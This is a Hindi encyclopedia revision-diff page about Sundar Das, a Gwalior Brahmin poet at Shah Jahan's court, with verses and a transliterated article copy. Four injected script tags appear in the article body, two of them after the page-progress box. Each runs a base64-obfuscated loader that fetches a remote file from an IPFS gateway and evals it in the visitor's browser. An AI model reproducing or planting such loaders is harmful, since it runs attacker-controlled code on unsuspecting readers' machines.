Difference between revisions of "सुंदर दास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना; Adding category Category:भक्ति काल (को हटा दिया गया हैं।))
m (Text replacement - "शृंगार" to "श्रृंगार")
 
(4 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*सुंदर दास [[ग्वालियर]] के ब्राह्मण थे और [[शाहजहाँ]] के दरबार में कविता सुनाया करते थे।  
+
{{बहुविकल्प|बहुविकल्पी शब्द=सुंदरदास|लेख का नाम=सुंदरदास (बहुविकल्पी)}}
*सुन्दर दास को बादशाह ने पहले '''कविराय''' की और फिर '''महाकविराय''' की पदवी दी थी।
+
 
*इन्होंने संवत 1688 में 'सुंदर श्रृंगार' नामक नायिका भेद का एक ग्रंथ लिखा।  
+
'''सुंदर दास''' [[ग्वालियर]] के [[ब्राह्मण]] थे और [[मुग़ल]] बादशाह [[शाहजहाँ]] के दरबार में [[कविता]] सुनाया करते थे। उन्हें बादशाह ने पहले '''कविराय''' की और फिर '''महाकविराय''' की पदवी से सम्मानित किया था।
*सुन्दर दास ने अपने पद में रचना की तिथि इस प्रकार दी है -  
+
 
<poem>संवत् सोरह सै बरस, बीते अठतर सीति।
+
*सुंदर दास ने संवत 1688 में 'सुंदर श्रृंगार' नामक नायिका भेद का एक ग्रंथ लिखा। अपनी पद में रचना की तिथि इस प्रकार दी है-  
कातिक सुदि सतमी गुरौ, रचे ग्रंथ करि प्रीति
+
<blockquote><poem>संवत् सोरह सै बरस, बीते अठतर सीति।
 +
कातिक सुदि सतमी गुरौ, रचे ग्रंथ करि प्रीति</poem></blockquote>
 
*इसके अतिरिक्त 'सिंहासन बत्तीसी' और 'बारहमासा' नाम की इनकी दो पुस्तकें और कही जाती हैं।  
 
*इसके अतिरिक्त 'सिंहासन बत्तीसी' और 'बारहमासा' नाम की इनकी दो पुस्तकें और कही जाती हैं।  
 
*[[यमक अलंकार|यमक]] और [[अनुप्रास अलंकार|अनुप्रास]] की ओर इनकी कुछ विशेष प्रवृत्ति जान पड़ती है।  
 
*[[यमक अलंकार|यमक]] और [[अनुप्रास अलंकार|अनुप्रास]] की ओर इनकी कुछ विशेष प्रवृत्ति जान पड़ती है।  
 
*इनकी रचना शब्द चमत्कारपूर्ण है -
 
*इनकी रचना शब्द चमत्कारपूर्ण है -
काके गए बसन पलटि आए बसन सु,
+
<blockquote><poem>काके गए बसन पलटि आए बसन सु,
 
मेरो कछु बस न रसन उर लागे हौ।
 
मेरो कछु बस न रसन उर लागे हौ।
 
भौंहैं तिरछौहैं कवि सुंदर सुजान सोहैं,
 
भौंहैं तिरछौहैं कवि सुंदर सुजान सोहैं,
Line 15: Line 16:
 
परसौ वे पाय निसि जाके अनुरागे हौ।
 
परसौ वे पाय निसि जाके अनुरागे हौ।
 
कौन बनिता के हौ जू कौन बनिता के हौ सु,  
 
कौन बनिता के हौ जू कौन बनिता के हौ सु,  
कौन बनिता के बनि, ताके संग जागे हौ</poem>
+
कौन बनिता के बनि, ताके संग जागे हौ</poem></blockquote>
 
 
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध=}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 27: Line 25:
 
[[Category:कवि]][[Category:साहित्य_कोश]]
 
[[Category:कवि]][[Category:साहित्य_कोश]]
 
[[Category:भक्ति काल]]
 
[[Category:भक्ति काल]]
 +
[[Category:मुग़ल साम्राज्य]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:59, 7 November 2017

chitr:Disamb2.jpg suandaradas ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- suandaradas (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

suandar das gvaliyar ke brahman the aur mugal badashah shahajahaan ke darabar mean kavita sunaya karate the. unhean badashah ne pahale kaviray ki aur phir mahakaviray ki padavi se sammanit kiya tha.

  • suandar das ne sanvat 1688 mean 'suandar shrriangar' namak nayika bhed ka ek granth likha. apani pad mean rachana ki tithi is prakar di hai-

sanvath sorah sai baras, bite athatar siti.
katik sudi satami gurau, rache granth kari priti

  • isake atirikt 'sianhasan battisi' aur 'barahamasa' nam ki inaki do pustakean aur kahi jati haian.
  • yamak aur anupras ki or inaki kuchh vishesh pravritti jan p dati hai.
  • inaki rachana shabd chamatkarapoorn hai -

kake ge basan palati ae basan su,
mero kachhu bas n rasan ur lage hau.
bhauanhaian tirachhauhaian kavi suandar sujan sohaian,
kachhoo alasauhaian gauanhaian, jake ras page hau
parasauan maian pay hute parasauan maian pay gahi,
parasau ve pay nisi jake anurage hau.
kaun banita ke hau joo kaun banita ke hau su,
kaun banita ke bani, take sang jage hau


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sambandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>